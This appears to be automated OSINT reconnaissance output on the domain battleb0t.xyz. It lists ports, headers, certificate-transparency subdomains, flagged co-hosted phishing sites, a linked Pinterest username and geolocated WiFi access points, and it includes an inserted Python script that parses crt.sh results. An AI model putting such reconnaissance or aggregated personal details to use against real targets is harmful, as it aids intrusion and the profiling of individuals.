| 2023-05-12 02:54:44 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"Content_Length": ["0"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Nf_Request_Id": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8"}, "X_Nf_Request_Id": ["01H04J1V5ZEHVH006E5VV5HBN1"], "Date": ["<REDACTED>"], "Server": ["Netlify"]} | 35.229.48.116 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ballpark (Net ID: 00:02:2D:3D:74:62) | 37.7642, -122.3993 |
| 2023-05-12 03:00:51 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.75): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Equiscript (Net ID: 00:18:0A:6F:96:37) | 32.8608, -79.9746 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomCECF14 (Net ID: 00:0C:F6:CE:CF:14) | 50.8897, 6.0563 |
| 2023-05-12 03:18:46 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image ExifOffset': (0x8769) Long=90 @ 66, 'EXIF ComponentsConfiguration': (0x9101) Undefined=YCbCr @ 112, 'Image YCbCrPositioning': (0x0213) Short=Centered @ 54, 'Image XResolution': (0x011A) Ratio=72 @ 74, 'EXIF FlashPixVersion': (0xA000) Undefined=0100 @ 124, 'Image YResolution': (0x011B) Ratio=72 @ 82, 'EXIF ColorSpace': (0xA001) Short=sRGB @ 136, 'EXIF ExifImageLength': (0xA003) Long=3088 @ 160, 'EXIF ExifVersion': (0x9000) Undefined=0221 @ 100, 'Image ResolutionUnit': (0x0128) Short=Pixels/Inch @ 42, 'EXIF ExifImageWidth': (0xA002) Long=2316 @ 148, 'EXIF SceneCaptureType': (0xA406) Short=Standard @ 172} | https://pics.battleb0t.xyz/images/carti_3.JPG |
| 2023-05-12 03:21:08 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | Pinterest (Category: social)
https://www.pinterest.com/dawidsulej/ | dawidsulej |
| 2023-05-12 02:53:52 | Netblock IPv6 Membership | No | Censys | 0 | 0 | 2 | 0 | None | 2606:50c0:8003::/48 | 2606:50c0:8003::153 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.213): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f6071cb5443bc-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:31:27 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 5 | 0 | None | domains@hostex.lt | % Hello, this is the DOMREG whois service.
%
% By submitting a query you agree not to use the information made
% available to:
% - allow, enable or otherwise support the transmission of unsolicited,
% commercial advertising or other solicitations whether via email or
% otherwise;
% - target advertising in any possible way;
% - to cause nuisance in any possible way to the registrants by sending
% (whether by automated, electronic processes capable of enabling
% high volumes or other possible means) messages to them.
%
% Version 0.4
%
% For more information please visit https://whois.lt
%
Domain: 000.lt
Status: registered
Registered: 2022-10-11
Expires: 2023-10-12
%
Registrar: Telia Lietuva, AB
Registrar website: http://www.hostex.lt
Registrar email: domains@hostex.lt
%
Contact organization: Telia Lietuva, AB
Contact email: domains@hostex.lt
%
Nameserver: ns3.hostex.lt
Nameserver: ns4.hostex.lt
Nameserver: ns1.hostex.lt
Nameserver: ns2.hostex.lt
|
| 2023-05-12 03:01:21 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.192): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | referrer-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | pannet-24 (Net ID: 00:01:8E:DA:59:C4) | 37.780462,-122.390564 |
| 2023-05-12 03:01:46 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.255): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BBHWIRELESS (Net ID: 00:00:C5:D7:60:F4) | 41.8781, -87.6298 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00steveng.github.io]
https://www.openphish.com/feed.txt | 00steveng.github.io |
| 2023-05-12 03:23:13 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.2:443 | 188.114.96.0/24 |
| 2023-05-12 02:54:54 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 2a06:98c1:3121::1:80 | 2a06:98c1:3121::1 |
| 2023-05-12 03:32:29 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.15:443 | 188.114.97.0/24 |
| 2023-05-12 03:08:45 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.210 | 104.196.30.220 |
| 2023-05-12 02:53:04 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | fluid.battleb0t.xyz |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["7c5818d4bebc22ee-ORD"]} | 188.114.97.1 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5221619826367a-FRA"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:443 | 188.114.96.1 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | PG Airnet (Net ID: 00:02:2D:27:B4:51) | 37.7642, -122.3993 |
| 2023-05-12 03:32:25 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.13:8443 | 188.114.97.0/24 |
| 2023-05-12 03:01:25 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.241): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0.crimson-perch.github.io]
https://www.openphish.com/feed.txt | 0.crimson-perch.github.io |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:2095 | 172.67.168.252 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | onshome (Net ID: 00:0C:41:67:02:1F) | 39.0469, -77.4903 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES_RT-205 (Net ID: 00:12:BF:FD:D7:C4) | 40.2024, 29.0398 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | devolo-000B3BEA35D8 (Net ID: 00:0B:3B:EA:35:D8) | 50.8897, 6.0563 |
| 2023-05-12 02:44:31 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | portainer.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': 
u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', 
u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': 
u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
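Added example, not part of the scan output: the crt.sh result list above is a Python-2 repr (u'' string prefixes) with one row per log entry, so every certificate appears at least twice (precertificate and leaf) and wildcard or multi-SAN certificates carry several names in name_value separated by newlines. The script below parses that format safely, collapses duplicates on (issuer, serial), and splits the names into live and expired as of the scan date. The sample is constructed from four entries above plus one built from the expired portainer.battleb0t.xyz certificate the scan records further down; that entry's entry_timestamp and id are placeholders.

```python
# Added example (not part of the scan output): turn a crt.sh result list, as
# dumped above in Python-2 repr with u'' string prefixes, into a de-duplicated
# subdomain inventory with a live/expired split.
import ast
from datetime import datetime

# Constructed sample in the page's own format: four entries copied in shape from
# the row above (including the precert/leaf duplicate pair crt.sh returns for
# one certificate) plus one built from the expired portainer.battleb0t.xyz
# certificate the scan records further down; its entry_timestamp and id are
# placeholders.
SAMPLE = r"""[
{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020},
{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897},
{u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074},
{u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265},
{u'not_after': u'2023-02-15T09:44:00', u'not_before': u'2022-11-17T09:44:01', u'issuer_ca_id': 183267, u'name_value': u'portainer.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'portainer.battleb0t.xyz', u'serial_number': u'04d598ae2a84a219ac809a6c747620f83fd8', u'entry_timestamp': u'2022-11-17T10:44:02.000', u'id': 0}
]"""

SCAN_DATE = datetime(2023, 5, 12)  # the date of the scan on this page


def parse_crtsh(dump):
    """ast.literal_eval accepts the legacy u'' prefix on Python 3 and never
    executes code, unlike eval()."""
    entries = ast.literal_eval(dump)
    if not isinstance(entries, list) or not all(isinstance(e, dict) for e in entries):
        raise ValueError("expected a list of crt.sh entry dicts")
    return entries


def names_in(entry):
    """name_value carries one SAN per line."""
    return [n.strip().lower() for n in entry["name_value"].split("\n") if n.strip()]


def unique_certs(entries):
    """crt.sh returns one row per log entry, so the precertificate, the leaf
    and any re-logged copy all appear; (issuer, serial) identifies the cert."""
    seen = {}
    for e in entries:
        seen.setdefault((e["issuer_ca_id"], e["serial_number"].lower()), e)
    return list(seen.values())


def latest_expiry(certs):
    """For each name, the not_after of the newest certificate covering it."""
    latest = {}
    for c in certs:
        exp = datetime.fromisoformat(c["not_after"])
        for n in names_in(c):
            if n not in latest or exp > latest[n]:
                latest[n] = exp
    return latest


def summarize(dump, now=SCAN_DATE):
    """Inventory of names seen in CT, split by whether a cert still covered
    them on the given date (defaults to the scan date for reproducibility)."""
    certs = unique_certs(parse_crtsh(dump))
    latest = latest_expiry(certs)
    return {
        "certs": len(certs),
        "names": sorted(latest),
        "live": sorted(n for n, exp in latest.items() if exp >= now),
        "expired": sorted(n for n, exp in latest.items() if exp < now),
        "wildcard": sorted(n for n in latest if n.startswith("*.")),
    }


if __name__ == "__main__":
    for k, v in summarize(SAMPLE).items():
        print(f"{k}: {v}")
```

A name whose newest certificate has expired (portainer.battleb0t.xyz here, which the scan also lists as an unresolved internet name) is a candidate for a decommissioned or dangling host rather than a live service, which is a different triage queue from the names that still have current certificates.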
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GOAT (Net ID: 00:00:C5:D3:87:1C) | 37.780462,-122.390564 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000b000.github.io | 185.199.111.153 |
| 2023-05-12 02:44:31 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | panel.battleb0t.xyz |
| 2023-05-12 03:01:45 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.247): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:09 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.0:8443 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | homespies (Net ID: 00:06:25:63:06:A6) | 33.336199,-111.89446440830702 |
